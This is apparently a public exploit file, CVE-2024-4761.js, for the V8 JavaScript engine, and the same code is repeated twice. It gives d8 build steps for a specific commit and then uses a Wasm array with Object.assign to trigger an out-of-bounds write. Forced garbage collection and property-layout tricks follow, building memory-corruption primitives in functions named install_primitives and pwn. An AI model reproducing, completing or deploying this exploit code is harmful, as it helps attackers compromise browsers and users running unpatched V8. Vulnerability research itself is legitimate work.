mistymntncop/CVE-2024-4761.js

## CVE-2024-4761.js
// Build d8 using:
// a) Run once
//    git checkout 6f98fbe86a0d11e6c902e2ee50f609db046daf71
//    gclient sync
//    gn gen ./out/x64.debug
//    gn gen ./out/x64.release
//
// b)
//    Debug Build:
//    ninja -C ./out/x64.debug d8
//
//    Release Build:
//    ninja -C ./out/x64.release d8
//

function gc_minor() { //scavenge
    for(let i = 0; i < 1000; i++) {
        new ArrayBuffer(0x10000);
    }
}

function gc_major() { //mark-sweep
    new ArrayBuffer(0x7FE00000);
}

d8.file.execute("wasm-module-builder.js");

let builder = new WasmModuleBuilder();

let array_type = builder.addArray(kWasmI32, true);
builder.addFunction('create_array', makeSig([kWasmI32], [wasmRefType(array_type)]))
    .addBody([
        kExprLocalGet, 0,
        kGCPrefix, kExprArrayNewDefault, array_type,
    ])
.exportFunc();

let wasm_instance = builder.instantiate({});
let wasm = wasm_instance.exports;

const kDescriptorIndexBitCount = 10;
const kMaxNumberOfDescriptors = (1 << kDescriptorIndexBitCount) - 4; //1020

//TF_BUILTIN(ObjectAssign, ObjectBuiltinsAssembler)
//    args.ForEach(
//        [=](TNode<Object> next_source) {
//          CallBuiltin(Builtin::kSetDataProperties, context, to, next_source);
//        },
//        IntPtrConstant(1));
//TF_BUILTIN(SetDataProperties, SetOrCopyDataPropertiesAssembler)
//  TailCallRuntime(Runtime::kSetDataProperties, context, target, source);
//RUNTIME_FUNCTION(Runtime_SetDataProperties)
//  JSReceiver::SetOrCopyDataProperties(...)
function install_primitives() {
    let src = {};
    for(let i = 0; i < (kMaxNumberOfDescriptors+1); i++) {
        src[`p${i}`] = 1;
    }
    //stops us from crashing in SetOrCopyDataProperties
    src.__defineGetter__("p0", function() {
        throw new Error("bailout");
    });
    //need to create the map beforehand to avoid descriptor arrays being allocated
    //innapropriately
    let dummy = {};
    dummy.i1 = 0;
    dummy.i2 = 0;
    dummy.i3 = 0;
    dummy.i4 = 0;
    for(let i = 1; i <= 16; i++) {
        dummy[`p${i}`] = 0;
    }

    var o = {};
    //inline properties
    o.i1 = 0;
    o.i2 = 0;
    o.i3 = 0;
    o.i4 = 0;

    //external properties
    o.p1 = 0; //fake SeqTwoByteString length field
    for(let i = 2; i <= 15; i++) {
        o[`p${i}`] = 0;
    }
    let wasm_array = wasm.create_array(0);
    o.p16 = 0; //reallocates new property array

    var arr1 = [1.1];//, 1.1, 1.1, 1.1];
    var arr2 = [{}];

    %DebugPrint(wasm_array);
    %DebugPrint(o);

    try {
        //trigger 1 element OOB zero write
        Object.assign(wasm_array, src);
    } catch(err) {}

    gc_major();
    %DebugPrint(wasm_array);
    o.p9 = 1024;
    o.p11 = 1024;
    //%DebugPrint(o); //will crash

    %DebugPrint(arr1);
}
function pwn() {
    install_primitives();
}

pwn();
	// Build d8 using:
	// a) Run once
	// git checkout 6f98fbe86a0d11e6c902e2ee50f609db046daf71
	// gclient sync
	// gn gen ./out/x64.debug
	// gn gen ./out/x64.release
	//
	// b)
	// Debug Build:
	// ninja -C ./out/x64.debug d8
	//
	// Release Build:
	// ninja -C ./out/x64.release d8
	//

	function gc_minor() { //scavenge
	for(let i = 0; i < 1000; i++) {
	new ArrayBuffer(0x10000);
	}
	}

	function gc_major() { //mark-sweep
	new ArrayBuffer(0x7FE00000);
	}

	d8.file.execute("wasm-module-builder.js");

	let builder = new WasmModuleBuilder();

	let array_type = builder.addArray(kWasmI32, true);
	builder.addFunction('create_array', makeSig([kWasmI32], [wasmRefType(array_type)]))
	.addBody([
	kExprLocalGet, 0,
	kGCPrefix, kExprArrayNewDefault, array_type,
	])
	.exportFunc();

	let wasm_instance = builder.instantiate({});
	let wasm = wasm_instance.exports;

	const kDescriptorIndexBitCount = 10;
	const kMaxNumberOfDescriptors = (1 << kDescriptorIndexBitCount) - 4; //1020

	//TF_BUILTIN(ObjectAssign, ObjectBuiltinsAssembler)
	// args.ForEach(
	// [=](TNode<Object> next_source) {
	// CallBuiltin(Builtin::kSetDataProperties, context, to, next_source);
	// },
	// IntPtrConstant(1));
	//TF_BUILTIN(SetDataProperties, SetOrCopyDataPropertiesAssembler)
	// TailCallRuntime(Runtime::kSetDataProperties, context, target, source);
	//RUNTIME_FUNCTION(Runtime_SetDataProperties)
	// JSReceiver::SetOrCopyDataProperties(...)
	function install_primitives() {
	let src = {};
	for(let i = 0; i < (kMaxNumberOfDescriptors+1); i++) {
	src[`p${i}`] = 1;
	}
	//stops us from crashing in SetOrCopyDataProperties
	src.__defineGetter__("p0", function() {
	throw new Error("bailout");
	});
	//need to create the map beforehand to avoid descriptor arrays being allocated
	//innapropriately
	let dummy = {};
	dummy.i1 = 0;
	dummy.i2 = 0;
	dummy.i3 = 0;
	dummy.i4 = 0;
	for(let i = 1; i <= 16; i++) {
	dummy[`p${i}`] = 0;
	}

	var o = {};
	//inline properties
	o.i1 = 0;
	o.i2 = 0;
	o.i3 = 0;
	o.i4 = 0;

	//external properties
	o.p1 = 0; //fake SeqTwoByteString length field
	for(let i = 2; i <= 15; i++) {
	o[`p${i}`] = 0;
	}
	let wasm_array = wasm.create_array(0);
	o.p16 = 0; //reallocates new property array

	var arr1 = [1.1];//, 1.1, 1.1, 1.1];
	var arr2 = [{}];

	%DebugPrint(wasm_array);
	%DebugPrint(o);

	try {
	//trigger 1 element OOB zero write
	Object.assign(wasm_array, src);
	} catch(err) {}

	gc_major();
	%DebugPrint(wasm_array);
	o.p9 = 1024;
	o.p11 = 1024;
	//%DebugPrint(o); //will crash

	%DebugPrint(arr1);
	}
	function pwn() {
	install_primitives();
	}

	pwn();